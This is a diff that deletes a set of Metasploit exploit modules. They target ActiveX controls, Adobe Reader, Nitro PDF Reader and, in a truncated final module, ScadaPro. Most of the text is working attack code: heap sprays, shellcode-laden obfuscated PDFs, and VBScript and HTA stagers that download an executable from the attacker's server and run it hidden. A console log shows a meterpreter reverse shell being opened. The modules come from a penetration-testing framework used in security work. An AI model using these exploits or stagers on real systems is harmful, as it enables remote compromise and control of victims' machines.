'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => ""
},
'Platform' => 'win',
'Targets' =>
[
# NTR ActiveX 1.1.8.0
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4'} ]
],
'Privileged' => false,
'DisclosureDate' => 'Jan 11 2012',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class
)
end
def get_spray(t, js_code, js_nops)
randnop = rand_text_alpha(rand(100) + 1)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 500; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[3] #IE 7 on Windows Vista SP2
else
return nil
end
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
print_status("User-agent: #{agent}")
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have a setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js = get_spray(my_target, js_code, js_nops)
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
address = 0x0c0c0c0c / 0x134
html = <<-MYHTML
<html>
<body>
<object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='test'></object>
<script>
#{js}
test.StopModule(#{address});
</script>
</body>
</html>
MYHTML
html = html.gsub(/^ {4}/, '')
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
The pointer is "controlled" here:
.text:10004449 mov eax, [ebp+arg_0] ; arg_0 is user controlled
.text:1000444C imul eax, 134h ; it looks good
.text:10004452 lea esi, [eax+edi] ; eax is user controlled
.text:10004452 ; edi is a heap pointer initialized while activex loading
.text:10004452 ; (Important note: the default heap isn't being used)
.text:10004452 ;
.text:10004452 ; edi:
.text:10004452 ;
.text:10004452 ; 0:000> !heap -p -a edi
.text:10004452 ; address 01fb370c found in
.text:10004452 ; _HEAP @ 1fb0000
.text:10004452 ; HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
.text:10004452 ; 01fb3668 0373 0000 [01] 01fb3670 01b90 - (busy)
.text:10004452 ; ? ntractivex118!DllUnregisterServer+10d18
.text:10004452 ;
.text:10004452 ; Initialization (while activex loading):
.text:10004452 ; ChildEBP RetAddr Args to Child
.text:10004452 ; 00138510 02a4e147 00001b84 02a4e8fb 00001b84 ntdll!RtlAllocateHeap+0xeac
.text:10004452 ; 00138548 02a4939e 00000000 7dc43038 00e057f8 ntractivex118!DllUnregisterServer+0x8823
.text:10004452 ; 0013855c 7dea5401 02093628 00000000 7dc43038 ntractivex118!DllUnregisterServer+0x3a7a
.text:10004452 ; 00138598 7deaa7f8 00e057f8 00e06154 80004005 mshtml!COleSite::InstantiateObjectFromCF+0x114
And user to get RCE here:
.text:1000446E mov eax, [esi+24h] ; esi can be user influenced
.text:10004471 test eax, eax
.text:10004473 jz short loc_10004477
.text:10004475 call eax ; RCE!
=end


@ -1,108 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution',
'Description' => %q{
This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The "exec"
function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands
on the victim machine.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod', #Initial discovery, poc
'sinn3r', #msf
],
'References' =>
[
[ 'OSVDB', '71559' ],
[ 'EDB', '17105' ]
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', {} ],
],
'DisclosureDate' => 'Apr 3 2011',
'DefaultTarget' => 0))
end
# Unfortunately if we echo the vbs cmdstager too many times, we tend to have random missing lines in
# either the payload or the vbs script. To avoid this problem, I ended up writing this custom routine
# that only uses one echo.
def build_vbs(url, payload_name, stager_name)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
tmp = "#{@temp_folder}/#{stager_name}"
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"\"Microsoft.XMLHTTP\"\") "
vbs << ": #{name_xmlhttp}.open \"\"GET\"\",\"\"http://#{url}\"\",False : #{name_xmlhttp}.send"
vbs << ": Set #{name_adodb} = CreateObject(\"\"ADODB.Stream\"\") "
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
vbs << ": #{name_adodb}.SaveToFile \"\"#{@temp_folder}/#{payload_name}.exe\"\",2 "
vbs << ": CreateObject(\"\"WScript.Shell\"\").Run \"\"#{@temp_folder}/#{payload_name}.exe\"\",0 >> #{tmp}"
return vbs
end
def exploit
@payload_name = rand_text_alpha(4)
@temp_folder = "C:/Windows/Temp"
super
end
def on_request_uri(cli, request)
if request.uri =~ /\.exe/
print_status("Sending payload EXE")
return if ((p=regenerate_payload(cli)) == nil)
data = generate_payload_exe( {:code=>p.encoded} )
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
return
end
# Payload's URL
payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
# Create the stager (download + execute payload)
stager_name = rand_text_alpha(6) + ".vbs"
stager = build_vbs(payload_src, @payload_name, stager_name)
html_obj_name = rand_text_alpha(6)
html = <<-EOS
<html>
<object classid='clsid:5818813E-D53D-47A5-ABBB-37E2A07056B5' id='#{html_obj_name}' />
</object>
<script language='vbscript'>
#{html_obj_name}.Exec "cmd","/c #{stager}",1,1,""
setTimeout "x=1", 3000
#{html_obj_name}.Exec "cmd","/c start #{@temp_folder}/#{stager_name}",1,1,""
</script>
</html>
EOS
# Remove extra tabs
html = html.gsub(/^ {4}/, "")
print_status("Sending #{self.name}")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end


@ -1,163 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution',
'Description' => %q{
This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The
LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run
arbitrary commands on the victim machine. This module has been successfully tested with the
ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration
Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2011-2657' ],
[ 'OSVDB', '76700'],
[ 'BID', '50274' ],
[ 'ZDI', '11-318' ],
[ 'URL', 'http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1' ],
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>
[
# LaunchHelp.dll 9.5.0.0
[ 'Windows Universal', {} ],
],
'DisclosureDate' => 'Oct 19 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('WINDOWSTEMP', [ true, "The Windows temporal folder.", "C:/Windows/Temp" ]),
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
])
end
def on_new_session(client)
if client.type != "meterpreter"
print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
print_error("The vbs stager and exe payload must be removed manually.")
return
end
# stdapi must be loaded before we can use fs.file
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin
print_warning("Deleting the vbs payload \"#{@stager_name}\" ...")
client.fs.file.rm("#{@temp_folder}/#{@stager_name}")
print_good("The vbs stager has been deleted successfully")
print_status("The exe payload #{@temp_folder}/#{@payload_name}.exe must be removed manually")
rescue ::Exception => e
print_error("Problems while the clenaup")
print_status("The vbs stager #{@temp_folder}/#{@stager_name} must be removed manually")
print_status("The exe payload #{@temp_folder}/#{@payload_name}.exe must be removed manually")
print_error("Exception: #{e.inspect}")
return
end
end
# Stager wrote by sinn3r to avoid problems when echoing the vbs cmdstager too many times.
# See "real_arcade_installerdlg.rb" for more information.
def build_vbs(url)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
tmp = "#{@temp_folder}/#{@stager_name}"
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"
return vbs
end
def exploit
@payload_name = rand_text_alpha(4)
@temp_folder = datastore['WINDOWSTEMP']
@stager_name = rand_text_alpha(6) + ".vbs"
super
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
# Avoid the attack if the victim doesn't have the same setup we're targeting
if not agent =~ /MSIE/
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end
if request.uri =~ /\.exe/
print_status("Sending payload EXE")
return if ((p=regenerate_payload(cli)) == nil)
data = generate_payload_exe( {:code=>p.encoded} )
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
return
end
# Payload's URL
payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
# Create the stager (download + execute payload)
stager = build_vbs(payload_src)
js = <<-JS
var actvx = new ActiveXObject('LaunchHelp.HelpLauncher.1');
actvx.LaunchProcess("cmd.exe", '/c #{stager}');
actvx.LaunchProcess("cmd.exe", "/c start #{@temp_folder}/#{@stager_name}");
JS
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
html = <<-EOS
<html>
<body>
<script>
#{js}
</script>
</body>
</html>
EOS
# Remove extra tabs
html = html.gsub(/^ {4}/, "")
print_status("Sending #{self.name}")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end


@ -1,178 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Collab.collectEmailInfo() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.
By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
'References' =>
[
[ 'CVE', '2007-5659' ],
[ 'OSVDB', '41495' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)', { 'Ret' => '' } ],
],
'DisclosureDate' => 'Feb 8 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
])
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Make some nops
nops = Rex::Text.to_unescape(make_nops(4))
# Randomize variables
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
rand9 = rand_text_alpha(rand(100) + 1)
rand10 = rand_text_alpha(rand(100) + 1)
rand11 = rand_text_alpha(rand(100) + 1)
rand12 = rand_text_alpha(rand(100) + 1)
script = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} ="";
for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
#{rand4} = #{rand2} + #{rand1};
#{rand5} = unescape("#{nops}");
#{rand6} = 20;
#{rand7} = #{rand6}+#{rand4}.length
while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
#{rand8} = #{rand5}.substring(0, #{rand7});
#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
#{rand10} = new Array();
for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
var #{rand12} = unescape("%u0c0c%u0c0c");
while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};
this.collabStore = Collab.collectEmailInfo({subj: "",msg: #{rand12}});
|
# Create the pdf
pdf = make_pdf(script)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
def random_non_ascii_string(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def io_def(id)
"%d 0 obj" % id
end
def io_ref(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def n_obfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ascii_hex_whitespace_encode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(js)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
# Randomize PDF version?
pdf = "%PDF-1.5" << eol
pdf << "%" << random_non_ascii_string(4) << eol
xref << pdf.length
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
xref << pdf.length
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
xref << pdf.length
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
xref << pdf.length
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
xref << pdf.length
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
xref << pdf.length
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end


@ -1,222 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',
'Description' => %q{
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat
Professional versions up to and including 9.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # Found in the wild
# Metasploit version by:
'hdm',
'pusscat',
'jduck'
],
'References' =>
[
[ 'CVE', '2009-4324' ],
[ 'BID', '37331' ],
[ 'OSVDB', '60980' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
# test results (on Windows XP SP3)
# reader 6.0.1 - vulnerable / doesn't work
# reader 7.0.5 - untested
# reader 7.0.8 - untested
# reader 7.0.9 - vulnerable / doesn't work
# reader 7.1.0 - untested
# reader 7.1.1 - untested
# reader 8.0.0 - untested
# reader 8.1.1 - works
# reader 8.1.2 - untested
# reader 8.1.3 - untested
# reader 8.1.4 - untested
# reader 8.1.5 - untested
# reader 8.1.6 - untested
# reader 9.0.0 - untested
# reader 9.1.0 - works
# reader 9.2 - works (no debugger, no DEP)
[ 'Adobe Reader Windows English (JS Heap Spray)',
{
'Size' => (0x10000/2),
'Ret' => 0x0c0c0c0c,
}
],
[ 'Adobe Reader Windows German (JS Heap Spray)',
{
'Size' => (0x10000/2),
'Ret' => 0x0a0a0a0a,
}
],
],
'DisclosureDate' => 'Dec 14 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
])
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Make some nops
nops = Rex::Text.to_unescape([target.ret].pack('V'))
# Randomize variables
#
len = 72
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
vtbuf = [target.ret].pack('V') * 4
vtbuf << rand_text_alpha(len - vtbuf.length)
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
retstring = Rex::Text.to_unescape(vtbuf)
# The printd strings are 72 bytes (??)
script = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} = unescape("#{nops}");
var #{rand3} = unescape("#{retstring}");
while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= #{rand2} + #{rand1};
}
util.printd("#{rand4}", new Date());
util.printd("#{rand5}", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(#{rand3}, new Date());
|
# Create the pdf
pdf = make_pdf(script)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
def random_non_ascii_string(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def io_def(id)
"%d 0 obj" % id
end
def io_ref(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def n_obfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ascii_hex_whitespace_encode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(js)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
pdf = "%PDF-1.5" << eol
pdf << "%" << random_non_ascii_string(4) << eol
xref << pdf.length
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
xref << pdf.length
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
xref << pdf.length
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
xref << pdf.length
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
xref << pdf.length
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
xref << pdf.length
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end


@ -1,219 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::FileDropper
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
'Description' => %q{
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
PDF Reader version 11. The saveAs() Javascript API function allows for writing
arbitrary files to the file system. Additionally, the launchURL() function allows
an attacker to execute local files on the file system and bypass the security dialog
Note: This is 100% reliable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
'Brendan Coles <bcoles [at] gmail.com>', # hidden hta tricks!
'sinn3r' # help with msf foo!
],
'References' =>
[
[ 'CVE', '2017-7442' ],
[ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ], # public advisory #1
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ], # public advisory #2 (verified and acquired by SSD)
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'Platform' => 'win',
'Targets' =>
[
# truly universal
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Jul 24 2017',
'DefaultTarget' => 0))
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
])
deregister_options('SSL', 'SSLVersion', 'SSLCert')
end
def build_vbs(url, stager_name)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
vbs = %Q|<head><hta:application
applicationname="#{@payload_name}"
border="none"
borderstyle="normal"
caption="false"
contextmenu="false"
icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
maximizebutton="false"
minimizebutton="false"
navigable="false"
scroll="false"
selection="false"
showintaskbar="No"
sysmenu="false"
version="1.0"
windowstate="Minimize"></head>
<style>* { visibility: hidden; }</style>
<script language="VBScript">
window.resizeTo 1,1
window.moveTo -2000,-2000
</script>
<script type="text/javascript">setTimeout("window.close()", 5000);</script>
<script language="VBScript">
On Error Resume Next
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
#{name_xmlhttp}.open "GET","http://#{url}",False
#{name_xmlhttp}.send
Set #{name_adodb} = CreateObject("ADODB.Stream")
#{name_adodb}.Open
#{name_adodb}.Type=1
#{name_adodb}.Write #{name_xmlhttp}.responseBody
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
set shellobj = CreateObject("wscript.shell")
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
</script>|
vbs.gsub!(/ /,'')
return vbs
end
def on_request_uri(cli, request)
if request.uri =~ /\.exe/
print_status("Sending second stage payload")
return if ((p=regenerate_payload(cli)) == nil)
data = generate_payload_exe( {:code=>p.encoded} )
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
return
end
end
def exploit
# In order to save binary data to the file system the payload is written to a .vbs
# file and execute it from there.
@payload_name = rand_text_alpha(4)
@temp_folder = "/Windows/Temp"
register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
if datastore['SRVHOST'] == '0.0.0.0'
lhost = Rex::Socket.source_address('50.50.50.50')
else
lhost = datastore['SRVHOST']
end
payload_src = lhost
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
stager_name = rand_text_alpha(6) + ".vbs"
pdf = %Q|%PDF-1.7
4 0 obj
<<
/Length 0
>>
stream
|
pdf << build_vbs(payload_src, stager_name)
pdf << %Q|
endstream endobj
5 0 obj
<<
/Type /Page
/Parent 2 0 R
/Contents 4 0 R
>>
endobj
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/OpenAction [ 5 0 R /Fit ]
/Names <<
/JavaScript <<
/Names [ (EmbeddedJS)
<<
/S /JavaScript
/JS (
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
)
>>
]
>>
>>
>>
endobj
2 0 obj
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
endobj
3 0 obj
<<>>
endobj
xref
0 6
0000000000 65535 f
0000000166 00000 n
0000000244 00000 n
0000000305 00000 n
0000000009 00000 n
0000000058 00000 n
trailer <<
/Size 6
/Root 1 0 R
>>
startxref
327
%%EOF|
pdf.gsub!(/ /,'')
file_create(pdf)
super
end
end
=begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
[*] Processing scripts/nitro.rc for ERB directives.
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/nitro.rc)> exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.175.1:4444
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.100.4:8080/
[*] Server started.
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
[*] Sending stage (957487 bytes) to 172.16.175.232
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
[+] Deleted C:/Windows/Temp/UOIr.hta
msf exploit(nitro_reader_jsapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2412 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\researcher\Desktop>
=end


@ -1,126 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Measuresoft ScadaPro Remote Command Execution',
'Description' => %q{
This module allows remote attackers to execute arbitrary commands on the
affected system by abusing via Directory Traversal attack when using the
'xf' command (execute function). An attacker can execute system() from
msvcrt.dll to upload a backdoor and gain remote code execution. This
